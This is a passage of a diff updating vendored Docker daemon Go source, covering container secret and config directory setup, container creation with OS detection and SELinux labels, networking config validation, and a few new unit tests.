+			return errors.Wrap(err, "error setting ownership for config")
+		}
+		if err := os.Chmod(fPath, ref.File.Mode); err != nil {
+			return errors.Wrap(err, "error setting file mode for config")
+		}
+	}
+
+	return daemon.remountSecretDir(c)
+}
+
+// createSecretsDir is used to create a dir suitable for storing container secrets.
+// In practice this is using a tmpfs mount and is used for both "configs" and "secrets"
+func (daemon *Daemon) createSecretsDir(c *container.Container) error {
+	// retrieve possible remapped range start for root UID, GID
+	rootIDs := daemon.idMappings.RootPair()
+	dir, err := c.SecretMountPath()
+	if err != nil {
+		return errors.Wrap(err, "error getting container secrets dir")
 	}
 
+	// create tmpfs
+	if err := idtools.MkdirAllAndChown(dir, 0700, rootIDs); err != nil {
+		return errors.Wrap(err, "error creating secret local mount path")
+	}
+
+	tmpfsOwnership := fmt.Sprintf("uid=%d,gid=%d", rootIDs.UID, rootIDs.GID)
+	if err := mount.Mount("tmpfs", dir, "tmpfs", "nodev,nosuid,noexec,"+tmpfsOwnership); err != nil {
+		return errors.Wrap(err, "unable to setup secret mount")
+	}
+	return nil
+}
+
+func (daemon *Daemon) remountSecretDir(c *container.Container) error {
+	dir, err := c.SecretMountPath()
+	if err != nil {
+		return errors.Wrap(err, "error getting container secrets path")
+	}
+	if err := label.Relabel(dir, c.MountLabel, false); err != nil {
+		logrus.WithError(err).WithField("dir", dir).Warn("Error while attempting to set selinux label")
+	}
+	rootIDs := daemon.idMappings.RootPair()
+	tmpfsOwnership := fmt.Sprintf("uid=%d,gid=%d", rootIDs.UID, rootIDs.GID)
+
 	// remount secrets ro
-	if err := mount.Mount("tmpfs", localMountPath, "tmpfs", "remount,ro,"+tmpfsOwnership); err != nil {
-		return errors.Wrap(err, "unable to remount secret dir as readonly")
+	if err := mount.Mount("tmpfs", dir, "tmpfs", "remount,ro,"+tmpfsOwnership); err != nil {
+		return errors.Wrap(err, "unable to remount dir as readonly")
 	}
 
 	return nil
 }
 
-func killProcessDirectly(container *container.Container) error {
-	if _, err := container.WaitStop(10 * time.Second); err != nil {
+func (daemon *Daemon) cleanupSecretDir(c *container.Container) {
+	dir, err := c.SecretMountPath()
+	if err != nil {
+		logrus.WithError(err).WithField("container", c.ID).Warn("error getting secrets mount path for container")
+	}
+	if err := mount.RecursiveUnmount(dir); err != nil {
+		logrus.WithField("dir", dir).WithError(err).Warn("Error while attmepting to unmount dir, this may prevent removal of container.")
+	}
+	if err := os.RemoveAll(dir); err != nil && !os.IsNotExist(err) {
+		logrus.WithField("dir", dir).WithError(err).Error("Error removing dir.")
+	}
+}
+
+func killProcessDirectly(cntr *container.Container) error {
+	ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
+	defer cancel()
+
+	// Block until the container to stops or timeout.
+	status := <-cntr.Wait(ctx, container.WaitConditionNotRunning)
+	if status.Err() != nil {
 		// Ensure that we don't kill ourselves
-		if pid := container.GetPID(); pid != 0 {
-			logrus.Infof("Container %s failed to exit within 10 seconds of kill - trying direct SIGKILL", stringid.TruncateID(container.ID))
-			if err := syscall.Kill(pid, 9); err != nil {
-				if err != syscall.ESRCH {
+		if pid := cntr.GetPID(); pid != 0 {
+			logrus.Infof("Container %s failed to exit within 10 seconds of kill - trying direct SIGKILL", stringid.TruncateID(cntr.ID))
+			if err := unix.Kill(pid, 9); err != nil {
+				if err != unix.ESRCH {
 					return err
 				}
 				e := errNoSuchProcess{pid, 9}
@@ -240,7 +352,7 @@ func killProcessDirectly(container *container.Container) error {
 }
 
 func detachMounted(path string) error {
-	return syscall.Unmount(path, syscall.MNT_DETACH)
+	return unix.Unmount(path, unix.MNT_DETACH)
 }
 
 func isLinkable(child *container.Container) bool {
@@ -274,8 +386,18 @@ func setupPathsAndSandboxOptions(container *container.Container, sboxOptions *[]
 	return nil
 }
 
-func initializeNetworkingPaths(container *container.Container, nc *container.Container) {
+func (daemon *Daemon) initializeNetworkingPaths(container *container.Container, nc *container.Container) error {
 	container.HostnamePath = nc.HostnamePath
 	container.HostsPath = nc.HostsPath
 	container.ResolvConfPath = nc.ResolvConfPath
+	return nil
+}
+
+func (daemon *Daemon) setupContainerMountsRoot(c *container.Container) error {
+	// get the root mount path so we can make it unbindable
+	p, err := c.MountsResourcePath("")
+	if err != nil {
+		return err
+	}
+	return idtools.MkdirAllAndChown(p, 0700, daemon.idMappings.RootPair())
 }
diff --git a/vendor/github.com/docker/docker/daemon/container_operations_windows.go b/vendor/github.com/docker/docker/daemon/container_operations_windows.go
index d05f251e05..562528a8ef 100644
--- a/vendor/github.com/docker/docker/daemon/container_operations_windows.go
+++ b/vendor/github.com/docker/docker/daemon/container_operations_windows.go
@@ -1,20 +1,67 @@
-// +build windows
-
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"fmt"
+	"io/ioutil"
+	"os"
+
 	"github.com/docker/docker/container"
+	"github.com/docker/docker/pkg/system"
 	"github.com/docker/libnetwork"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 func (daemon *Daemon) setupLinkedContainers(container *container.Container) ([]string, error) {
 	return nil, nil
 }
 
-// getSize returns real size & virtual size
-func (daemon *Daemon) getSize(container *container.Container) (int64, int64) {
-	// TODO Windows
-	return 0, 0
+func (daemon *Daemon) setupConfigDir(c *container.Container) (setupErr error) {
+	if len(c.ConfigReferences) == 0 {
+		return nil
+	}
+
+	localPath := c.ConfigsDirPath()
+	logrus.Debugf("configs: setting up config dir: %s", localPath)
+
+	// create local config root
+	if err := system.MkdirAllWithACL(localPath, 0, system.SddlAdministratorsLocalSystem); err != nil {
+		return errors.Wrap(err, "error creating config dir")
+	}
+
+	defer func() {
+		if setupErr != nil {
+			if err := os.RemoveAll(localPath); err != nil {
+				logrus.Errorf("error cleaning up config dir: %s", err)
+			}
+		}
+	}()
+
+	if c.DependencyStore == nil {
+		return fmt.Errorf("config store is not initialized")
+	}
+
+	for _, configRef := range c.ConfigReferences {
+		// TODO (ehazlett): use type switch when more are supported
+		if configRef.File == nil {
+			logrus.Error("config target type is not a file target")
+			continue
+		}
+
+		fPath := c.ConfigFilePath(*configRef)
+		log := logrus.WithFields(logrus.Fields{"name": configRef.File.Name, "path": fPath})
+
+		log.Debug("injecting config")
+		config, err := c.DependencyStore.Configs().Get(configRef.ConfigID)
+		if err != nil {
+			return errors.Wrap(err, "unable to get config from config store")
+		}
+		if err := ioutil.WriteFile(fPath, config.Spec.Data, configRef.File.Mode); err != nil {
+			return errors.Wrap(err, "error injecting config")
+		}
+	}
+
+	return nil
 }
 
 func (daemon *Daemon) setupIpcDirs(container *container.Container) error {
@@ -35,6 +82,63 @@ func detachMounted(path string) error {
 	return nil
 }
 
+func (daemon *Daemon) setupSecretDir(c *container.Container) (setupErr error) {
+	if len(c.SecretReferences) == 0 {
+		return nil
+	}
+
+	localMountPath, err := c.SecretMountPath()
+	if err != nil {
+		return err
+	}
+	logrus.Debugf("secrets: setting up secret dir: %s", localMountPath)
+
+	// create local secret root
+	if err := system.MkdirAllWithACL(localMountPath, 0, system.SddlAdministratorsLocalSystem); err != nil {
+		return errors.Wrap(err, "error creating secret local directory")
+	}
+
+	defer func() {
+		if setupErr != nil {
+			if err := os.RemoveAll(localMountPath); err != nil {
+				logrus.Errorf("error cleaning up secret mount: %s", err)
+			}
+		}
+	}()
+
+	if c.DependencyStore == nil {
+		return fmt.Errorf("secret store is not initialized")
+	}
+
+	for _, s := range c.SecretReferences {
+		// TODO (ehazlett): use type switch when more are supported
+		if s.File == nil {
+			logrus.Error("secret target type is not a file target")
+			continue
+		}
+
+		// secrets are created in the SecretMountPath on the host, at a
+		// single level
+		fPath, err := c.SecretFilePath(*s)
+		if err != nil {
+			return err
+		}
+		logrus.WithFields(logrus.Fields{
+			"name": s.File.Name,
+			"path": fPath,
+		}).Debug("injecting secret")
+		secret, err := c.DependencyStore.Secrets().Get(s.SecretID)
+		if err != nil {
+			return errors.Wrap(err, "unable to get secret from secret store")
+		}
+		if err := ioutil.WriteFile(fPath, secret.Spec.Data, s.File.Mode); err != nil {
+			return errors.Wrap(err, "error injecting secret")
+		}
+	}
+
+	return nil
+}
+
 func killProcessDirectly(container *container.Container) error {
 	return nil
 }
@@ -48,12 +152,50 @@ func enableIPOnPredefinedNetwork() bool {
 }
 
 func (daemon *Daemon) isNetworkHotPluggable() bool {
-	return false
+	return true
 }
 
 func setupPathsAndSandboxOptions(container *container.Container, sboxOptions *[]libnetwork.SandboxOption) error {
 	return nil
 }
 
-func initializeNetworkingPaths(container *container.Container, nc *container.Container) {
+func (daemon *Daemon) initializeNetworkingPaths(container *container.Container, nc *container.Container) error {
+
+	if nc.HostConfig.Isolation.IsHyperV() {
+		return fmt.Errorf("sharing of hyperv containers network is not supported")
+	}
+
+	container.NetworkSharedContainerID = nc.ID
+
+	if nc.NetworkSettings != nil {
+		for n := range nc.NetworkSettings.Networks {
+			sn, err := daemon.FindNetwork(n)
+			if err != nil {
+				continue
+			}
+
+			ep, err := getEndpointInNetwork(nc.Name, sn)
+			if err != nil {
+				continue
+			}
+
+			data, err := ep.DriverInfo()
+			if err != nil {
+				continue
+			}
+
+			if data["GW_INFO"] != nil {
+				gwInfo := data["GW_INFO"].(map[string]interface{})
+				if gwInfo["hnsid"] != nil {
+					container.SharedEndpointList = append(container.SharedEndpointList, gwInfo["hnsid"].(string))
+				}
+			}
+
+			if data["hnsid"] != nil {
+				container.SharedEndpointList = append(container.SharedEndpointList, data["hnsid"].(string))
+			}
+		}
+	}
+
+	return nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/container_unix_test.go b/vendor/github.com/docker/docker/daemon/container_unix_test.go
new file mode 100644
index 0000000000..b4c5f84c7e
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/container_unix_test.go
@@ -0,0 +1,44 @@
+// +build linux freebsd
+
+package daemon
+
+import (
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/daemon/config"
+	"github.com/docker/go-connections/nat"
+	"gotest.tools/assert"
+)
+
+// TestContainerWarningHostAndPublishPorts that a warning is returned when setting network mode to host and specifying published ports.
+// This should not be tested on Windows because Windows doesn't support "host" network mode.
+func TestContainerWarningHostAndPublishPorts(t *testing.T) {
+	testCases := []struct {
+		ports    nat.PortMap
+		warnings []string
+	}{
+		{ports: nat.PortMap{}},
+		{ports: nat.PortMap{
+			"8080": []nat.PortBinding{{HostPort: "8989"}},
+		}, warnings: []string{"Published ports are discarded when using host network mode"}},
+	}
+
+	for _, tc := range testCases {
+		hostConfig := &containertypes.HostConfig{
+			Runtime:      "runc",
+			NetworkMode:  "host",
+			PortBindings: tc.ports,
+		}
+		cs := &config.Config{
+			CommonUnixConfig: config.CommonUnixConfig{
+				Runtimes: map[string]types.Runtime{"runc": {}},
+			},
+		}
+		d := &Daemon{configStore: cs}
+		wrns, err := d.verifyContainerSettings("", hostConfig, &containertypes.Config{}, false)
+		assert.NilError(t, err)
+		assert.DeepEqual(t, tc.warnings, wrns)
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/container_windows.go b/vendor/github.com/docker/docker/daemon/container_windows.go
new file mode 100644
index 0000000000..0ca8039dd6
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/container_windows.go
@@ -0,0 +1,9 @@
+package daemon // import "github.com/docker/docker/daemon"
+
+import (
+	"github.com/docker/docker/container"
+)
+
+func (daemon *Daemon) saveApparmorConfig(container *container.Container) error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/create.go b/vendor/github.com/docker/docker/daemon/create.go
index c71d14e5fc..6702243faf 100644
--- a/vendor/github.com/docker/docker/daemon/create.go
+++ b/vendor/github.com/docker/docker/daemon/create.go
@@ -1,4 +1,4 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"fmt"
@@ -7,21 +7,18 @@ import (
 	"strings"
 	"time"
 
-	"github.com/pkg/errors"
-
-	"github.com/Sirupsen/logrus"
-	apierrors "github.com/docker/docker/api/errors"
 	"github.com/docker/docker/api/types"
 	containertypes "github.com/docker/docker/api/types/container"
 	networktypes "github.com/docker/docker/api/types/network"
 	"github.com/docker/docker/container"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/image"
-	"github.com/docker/docker/layer"
 	"github.com/docker/docker/pkg/idtools"
-	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/pkg/system"
 	"github.com/docker/docker/runconfig"
-	volumestore "github.com/docker/docker/volume/store"
-	"github.com/opencontainers/runc/libcontainer/label"
+	"github.com/opencontainers/selinux/go-selinux/label"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 // CreateManagedContainer creates a container that is managed by a Service
@@ -37,17 +34,31 @@ func (daemon *Daemon) ContainerCreate(params types.ContainerCreateConfig) (conta
 func (daemon *Daemon) containerCreate(params types.ContainerCreateConfig, managed bool) (containertypes.ContainerCreateCreatedBody, error) {
 	start := time.Now()
 	if params.Config == nil {
-		return containertypes.ContainerCreateCreatedBody{}, fmt.Errorf("Config cannot be empty in order to create a container")
+		return containertypes.ContainerCreateCreatedBody{}, errdefs.InvalidParameter(errors.New("Config cannot be empty in order to create a container"))
+	}
+
+	os := runtime.GOOS
+	if params.Config.Image != "" {
+		img, err := daemon.imageService.GetImage(params.Config.Image)
+		if err == nil {
+			os = img.OS
+		}
+	} else {
+		// This mean scratch. On Windows, we can safely assume that this is a linux
+		// container. On other platforms, it's the host OS (which it already is)
+		if runtime.GOOS == "windows" && system.LCOWSupported() {
+			os = "linux"
+		}
 	}
 
-	warnings, err := daemon.verifyContainerSettings(params.HostConfig, params.Config, false)
+	warnings, err := daemon.verifyContainerSettings(os, params.HostConfig, params.Config, false)
 	if err != nil {
-		return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, err
+		return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, errdefs.InvalidParameter(err)
 	}
 
-	err = daemon.verifyNetworkingConfig(params.NetworkingConfig)
+	err = verifyNetworkingConfig(params.NetworkingConfig)
 	if err != nil {
-		return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, err
+		return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, errdefs.InvalidParameter(err)
 	}
 
 	if params.HostConfig == nil {
@@ -55,12 +66,12 @@ func (daemon *Daemon) containerCreate(params types.ContainerCreateConfig, manage
 	}
 	err = daemon.adaptContainerSettings(params.HostConfig, params.AdjustCPUShares)
 	if err != nil {
-		return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, err
+		return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, errdefs.InvalidParameter(err)
 	}
 
 	container, err := daemon.create(params, managed)
 	if err != nil {
-		return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, daemon.imageNotExistToErrcode(err)
+		return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, err
 	}
 	containerActions.WithValues("create").UpdateSince(start)
 
@@ -76,27 +87,40 @@ func (daemon *Daemon) create(params types.ContainerCreateConfig, managed bool) (
 		err       error
 	)
 
+	os := runtime.GOOS
 	if params.Config.Image != "" {
-		img, err = daemon.GetImage(params.Config.Image)
+		img, err = daemon.imageService.GetImage(params.Config.Image)
 		if err != nil {
 			return nil, err
 		}
-
-		if runtime.GOOS == "solaris" && img.OS != "solaris " {
-			return nil, errors.New("Platform on which parent image was created is not Solaris")
+		if img.OS != "" {
+			os = img.OS
+		} else {
+			// default to the host OS except on Windows with LCOW
+			if runtime.GOOS == "windows" && system.LCOWSupported() {
+				os = "linux"
+			}
 		}
 		imgID = img.ID()
+
+		if runtime.GOOS == "windows" && img.OS == "linux" && !system.LCOWSupported() {
+			return nil, errors.New("operating system on which parent image was created is not Windows")
+		}
+	} else {
+		if runtime.GOOS == "windows" {
+			os = "linux" // 'scratch' case.
+		}
 	}
 
 	if err := daemon.mergeAndVerifyConfig(params.Config, img); err != nil {
-		return nil, err
+		return nil, errdefs.InvalidParameter(err)
 	}
 
 	if err := daemon.mergeAndVerifyLogConfig(&params.HostConfig.LogConfig); err != nil {
-		return nil, err
+		return nil, errdefs.InvalidParameter(err)
 	}
 
-	if container, err = daemon.newContainer(params.Name, params.Config, params.HostConfig, imgID, managed); err != nil {
+	if container, err = daemon.newContainer(params.Name, os, params.Config, params.HostConfig, imgID, managed); err != nil {
 		return nil, err
 	}
 	defer func() {
@@ -113,19 +137,35 @@ func (daemon *Daemon) create(params types.ContainerCreateConfig, managed bool) (
 
 	container.HostConfig.StorageOpt = params.HostConfig.StorageOpt
 
-	// Set RWLayer for container after mount labels have been set
-	if err := daemon.setRWLayer(container); err != nil {
-		return nil, err
+	// Fixes: https://github.com/moby/moby/issues/34074 and
+	// https://github.com/docker/for-win/issues/999.
+	// Merge the daemon's storage options if they aren't already present. We only
+	// do this on Windows as there's no effective sandbox size limit other than
+	// physical on Linux.
+	if runtime.GOOS == "windows" {
+		if container.HostConfig.StorageOpt == nil {
+			container.HostConfig.StorageOpt = make(map[string]string)
+		}
+		for _, v := range daemon.configStore.GraphOptions {
+			opt := strings.SplitN(v, "=", 2)
+			if _, ok := container.HostConfig.StorageOpt[opt[0]]; !ok {
+				container.HostConfig.StorageOpt[opt[0]] = opt[1]
+			}
+		}
 	}
 
-	rootUID, rootGID, err := idtools.GetRootUIDGID(daemon.uidMaps, daemon.gidMaps)
+	// Set RWLayer for container after mount labels have been set
+	rwLayer, err := daemon.imageService.CreateLayer(container, setupInitLayer(daemon.idMappings))
 	if err != nil {
-		return nil, err
+		return nil, errdefs.System(err)
 	}
-	if err := idtools.MkdirAs(container.Root, 0700, rootUID, rootGID); err != nil {
+	container.RWLayer = rwLayer
+
+	rootIDs := daemon.idMappings.RootPair()
+	if err := idtools.MkdirAndChown(container.Root, 0700, rootIDs); err != nil {
 		return nil, err
 	}
-	if err := idtools.MkdirAs(container.CheckpointDir(), 0700, rootUID, rootGID); err != nil {
+	if err := idtools.MkdirAndChown(container.CheckpointDir(), 0700, rootIDs); err != nil {
 		return nil, err
 	}
 
@@ -133,7 +173,7 @@ func (daemon *Daemon) create(params types.ContainerCreateConfig, managed bool) (
 		return nil, err
 	}
 
-	if err := daemon.createContainerPlatformSpecificSettings(container, params.Config, params.HostConfig); err != nil {
+	if err := daemon.createContainerOSSpecificSettings(container, params.Config, params.HostConfig); err != nil {
 		return nil, err
 	}
 
@@ -143,24 +183,37 @@ func (daemon *Daemon) create(params types.ContainerCreateConfig, managed bool) (
 	}
 	// Make sure NetworkMode has an acceptable value. We do this to ensure
 	// backwards API compatibility.
-	container.HostConfig = runconfig.SetDefaultNetModeIfBlank(container.HostConfig)
+	runconfig.SetDefaultNetModeIfBlank(container.HostConfig)
 
 	daemon.updateContainerNetworkSettings(container, endpointsConfigs)
-
-	if err := container.ToDisk(); err != nil {
-		logrus.Errorf("Error saving new container to disk: %v", err)
-		return nil, err
-	}
 	if err := daemon.Register(container); err != nil {
 		return nil, err
 	}
+	stateCtr.set(container.ID, "stopped")
 	daemon.LogContainerEvent(container, "create")
 	return container, nil
 }
 
-func (daemon *Daemon) generateSecurityOpt(ipcMode containertypes.IpcMode, pidMode containertypes.PidMode, privileged bool) ([]string, error) {
+func toHostConfigSelinuxLabels(labels []string) []string {
+	for i, l := range labels {
+		labels[i] = "label=" + l
+	}
+	return labels
+}
+
+func (daemon *Daemon) generateSecurityOpt(hostConfig *containertypes.HostConfig) ([]string, error) {
+	for _, opt := range hostConfig.SecurityOpt {
+		con := strings.Split(opt, "=")
+		if con[0] == "label" {
+			// Caller overrode SecurityOpts
+			return nil, nil
+		}
+	}
+	ipcMode := hostConfig.IpcMode
+	pidMode := hostConfig.PidMode
+	privileged := hostConfig.Privileged
 	if ipcMode.IsHost() || pidMode.IsHost() || privileged {
-		return label.DisableSecOpt(), nil
+		return toHostConfigSelinuxLabels(label.DisableSecOpt()), nil
 	}
 
 	var ipcLabel []string
@@ -174,7 +227,7 @@ func (daemon *Daemon) generateSecurityOpt(ipcMode containertypes.IpcMode, pidMod
 		}
 		ipcLabel = label.DupSecOpt(c.ProcessLabel)
 		if pidContainer == "" {
-			return ipcLabel, err
+			return toHostConfigSelinuxLabels(ipcLabel), err
 		}
 	}
 	if pidContainer != "" {
@@ -185,7 +238,7 @@ func (daemon *Daemon) generateSecurityOpt(ipcMode containertypes.IpcMode, pidMod
 
 		pidLabel = label.DupSecOpt(c.ProcessLabel)
 		if ipcContainer == "" {
-			return pidLabel, err
+			return toHostConfigSelinuxLabels(pidLabel), err
 		}
 	}
 
@@ -195,52 +248,11 @@ func (daemon *Daemon) generateSecurityOpt(ipcMode containertypes.IpcMode, pidMod
 				return nil, fmt.Errorf("--ipc and --pid containers SELinux labels aren't the same")
 			}
 		}
-		return pidLabel, nil
+		return toHostConfigSelinuxLabels(pidLabel), nil
 	}
 	return nil, nil
 }
 
-func (daemon *Daemon) setRWLayer(container *container.Container) error {
-	var layerID layer.ChainID
-	if container.ImageID != "" {
-		img, err := daemon.imageStore.Get(container.ImageID)
-		if err != nil {
-			return err
-		}
-		layerID = img.RootFS.ChainID()
-	}
-
-	rwLayer, err := daemon.layerStore.CreateRWLayer(container.ID, layerID, container.MountLabel, daemon.getLayerInit(), container.HostConfig.StorageOpt)
-
-	if err != nil {
-		return err
-	}
-	container.RWLayer = rwLayer
-
-	return nil
-}
-
-// VolumeCreate creates a volume with the specified name, driver, and opts
-// This is called directly from the Engine API
-func (daemon *Daemon) VolumeCreate(name, driverName string, opts, labels map[string]string) (*types.Volume, error) {
-	if name == "" {
-		name = stringid.GenerateNonCryptoID()
-	}
-
-	v, err := daemon.volumes.Create(name, driverName, opts, labels)
-	if err != nil {
-		if volumestore.IsNameConflict(err) {
-			return nil, fmt.Errorf("A volume named %s already exists. Choose a different volume name.", name)
-		}
-		return nil, err
-	}
-
-	daemon.LogVolumeEvent(v.Name(), "create", map[string]string{"driver": v.DriverName()})
-	apiV := volumeToAPIType(v)
-	apiV.Mountpoint = v.Path()
-	return apiV, nil
-}
-
 func (daemon *Daemon) mergeAndVerifyConfig(config *containertypes.Config, img *image.Image) error {
 	if img != nil && img.Config != nil {
 		if err := merge(config, img.Config); err != nil {
@@ -259,22 +271,25 @@ func (daemon *Daemon) mergeAndVerifyConfig(config *containertypes.Config, img *i
 
 // Checks if the client set configurations for more than one network while creating a container
 // Also checks if the IPAMConfig is valid
-func (daemon *Daemon) verifyNetworkingConfig(nwConfig *networktypes.NetworkingConfig) error {
+func verifyNetworkingConfig(nwConfig *networktypes.NetworkingConfig) error {
 	if nwConfig == nil || len(nwConfig.EndpointsConfig) == 0 {
 		return nil
 	}
 	if len(nwConfig.EndpointsConfig) == 1 {
-		for _, v := range nwConfig.EndpointsConfig {
-			if v != nil && v.IPAMConfig != nil {
+		for k, v := range nwConfig.EndpointsConfig {
+			if v == nil {
+				return errdefs.InvalidParameter(errors.Errorf("no EndpointSettings for %s", k))
+			}
+			if v.IPAMConfig != nil {
 				if v.IPAMConfig.IPv4Address != "" && net.ParseIP(v.IPAMConfig.IPv4Address).To4() == nil {
-					return apierrors.NewBadRequestError(fmt.Errorf("invalid IPv4 address: %s", v.IPAMConfig.IPv4Address))
+					return errors.Errorf("invalid IPv4 address: %s", v.IPAMConfig.IPv4Address)
 				}
 				if v.IPAMConfig.IPv6Address != "" {
 					n := net.ParseIP(v.IPAMConfig.IPv6Address)
 					// if the address is an invalid network address (ParseIP == nil) or if it is
 					// an IPv4 address (To4() != nil), then it is an invalid IPv6 address
 					if n == nil || n.To4() != nil {
-						return apierrors.NewBadRequestError(fmt.Errorf("invalid IPv6 address: %s", v.IPAMConfig.IPv6Address))
+						return errors.Errorf("invalid IPv6 address: %s", v.IPAMConfig.IPv6Address)
 					}
 				}
 			}
@@ -285,6 +300,5 @@ func (daemon *Daemon) verifyNetworkingConfig(nwConfig *networktypes.NetworkingCo
 	for k := range nwConfig.EndpointsConfig {
 		l = append(l, k)
 	}
-	err := fmt.Errorf("Container cannot be connected to network endpoints: %s", strings.Join(l, ", "))
-	return apierrors.NewBadRequestError(err)
+	return errors.Errorf("Container cannot be connected to network endpoints: %s", strings.Join(l, ", "))
 }
diff --git a/vendor/github.com/docker/docker/daemon/create_test.go b/vendor/github.com/docker/docker/daemon/create_test.go
new file mode 100644
index 0000000000..3dba847d46
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/create_test.go
@@ -0,0 +1,21 @@
+package daemon // import "github.com/docker/docker/daemon"
+
+import (
+	"testing"
+
+	"github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/errdefs"
+	"gotest.tools/assert"
+)
+
+// Test case for 35752
+func TestVerifyNetworkingConfig(t *testing.T) {
+	name := "mynet"
+	endpoints := make(map[string]*network.EndpointSettings, 1)
+	endpoints[name] = nil
+	nwConfig := &network.NetworkingConfig{
+		EndpointsConfig: endpoints,
+	}
+	err := verifyNetworkingConfig(nwConfig)
+	assert.Check(t, errdefs.IsInvalidParameter(err))
+}
diff --git a/vendor/github.com/docker/docker/daemon/create_unix.go b/vendor/github.com/docker/docker/daemon/create_unix.go
index 2fe5c98a79..eb9b653730 100644
--- a/vendor/github.com/docker/docker/daemon/create_unix.go
+++ b/vendor/github.com/docker/docker/daemon/create_unix.go
@@ -1,32 +1,45 @@
 // +build !windows
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"context"
 	"fmt"
 	"os"
 	"path/filepath"
 
-	"github.com/Sirupsen/logrus"
 	containertypes "github.com/docker/docker/api/types/container"
 	mounttypes "github.com/docker/docker/api/types/mount"
 	"github.com/docker/docker/container"
+	"github.com/docker/docker/oci"
 	"github.com/docker/docker/pkg/stringid"
-	"github.com/opencontainers/runc/libcontainer/label"
+	volumeopts "github.com/docker/docker/volume/service/opts"
+	"github.com/opencontainers/selinux/go-selinux/label"
+	"github.com/sirupsen/logrus"
 )
 
-// createContainerPlatformSpecificSettings performs platform specific container create functionality
-func (daemon *Daemon) createContainerPlatformSpecificSettings(container *container.Container, config *containertypes.Config, hostConfig *containertypes.HostConfig) error {
+// createContainerOSSpecificSettings performs host-OS specific container create functionality
+func (daemon *Daemon) createContainerOSSpecificSettings(container *container.Container, config *containertypes.Config, hostConfig *containertypes.HostConfig) error {
 	if err := daemon.Mount(container); err != nil {
 		return err
 	}
 	defer daemon.Unmount(container)
 
-	rootUID, rootGID := daemon.GetRemappedUIDGID()
-	if err := container.SetupWorkingDirectory(rootUID, rootGID); err != nil {
+	rootIDs := daemon.idMappings.RootPair()
+	if err := container.SetupWorkingDirectory(rootIDs); err != nil {
 		return err
 	}
 
+	// Set the default masked and readonly paths with regard to the host config options if they are not set.
+	if hostConfig.MaskedPaths == nil && !hostConfig.Privileged {
+		hostConfig.MaskedPaths = oci.DefaultSpec().Linux.MaskedPaths // Set it to the default if nil
+		container.HostConfig.MaskedPaths = hostConfig.MaskedPaths
+	}
+	if hostConfig.ReadonlyPaths == nil && !hostConfig.Privileged {
+		hostConfig.ReadonlyPaths = oci.DefaultSpec().Linux.ReadonlyPaths // Set it to the default if nil
+		container.HostConfig.ReadonlyPaths = hostConfig.ReadonlyPaths
+	}
+
 	for spec := range config.Volumes {
 		name := stringid.GenerateNonCryptoID()
 		destination := filepath.Clean(spec)
@@ -46,16 +59,16 @@ func (daemon *Daemon) createContainerPlatformSpecificSettings(container *contain
 			return fmt.Errorf("cannot mount volume over existing file, file exists %s", path)
 		}
 
-		v, err := daemon.volumes.CreateWithRef(name, hostConfig.VolumeDriver, container.ID, nil, nil)
+		v, err := daemon.volumes.Create(context.TODO(), name, hostConfig.VolumeDriver, volumeopts.WithCreateReference(container.ID))
 		if err != nil {
 			return err
 		}
 
-		if err := label.Relabel(v.Path(), container.MountLabel, true); err != nil {
+		if err := label.Relabel(v.Mountpoint, container.MountLabel, true); err != nil {
 			return err
 		}
 
-		container.AddMountPointWithVolume(destination, v, true)
+		container.AddMountPointWithVolume(destination, &volumeWrapper{v: v, s: daemon.volumes}, true)
 	}
 	return daemon.populateVolumes(container)
 }
diff --git a/vendor/github.com/docker/docker/daemon/create_windows.go b/vendor/github.com/docker/docker/daemon/create_windows.go
index bbf0dbe7b9..37e425a014 100644
--- a/vendor/github.com/docker/docker/daemon/create_windows.go
+++ b/vendor/github.com/docker/docker/daemon/create_windows.go
@@ -1,24 +1,37 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"context"
 	"fmt"
+	"runtime"
 
 	containertypes "github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/container"
 	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/docker/volume"
+	volumemounts "github.com/docker/docker/volume/mounts"
+	volumeopts "github.com/docker/docker/volume/service/opts"
 )
 
-// createContainerPlatformSpecificSettings performs platform specific container create functionality
-func (daemon *Daemon) createContainerPlatformSpecificSettings(container *container.Container, config *containertypes.Config, hostConfig *containertypes.HostConfig) error {
-	// Make sure the host config has the default daemon isolation if not specified by caller.
-	if containertypes.Isolation.IsDefault(containertypes.Isolation(hostConfig.Isolation)) {
-		hostConfig.Isolation = daemon.defaultIsolation
-	}
+// createContainerOSSpecificSettings performs host-OS specific container create functionality
+func (daemon *Daemon) createContainerOSSpecificSettings(container *container.Container, config *containertypes.Config, hostConfig *containertypes.HostConfig) error {
 
+	if container.OS == runtime.GOOS {
+		// Make sure the host config has the default daemon isolation if not specified by caller.
+		if containertypes.Isolation.IsDefault(containertypes.Isolation(hostConfig.Isolation)) {
+			hostConfig.Isolation = daemon.defaultIsolation
+		}
+	} else {
+		// LCOW must be a Hyper-V container as you can't run a shared kernel when one
+		// is a Windows kernel, the other is a Linux kernel.
+		if containertypes.Isolation.IsProcess(containertypes.Isolation(hostConfig.Isolation)) {
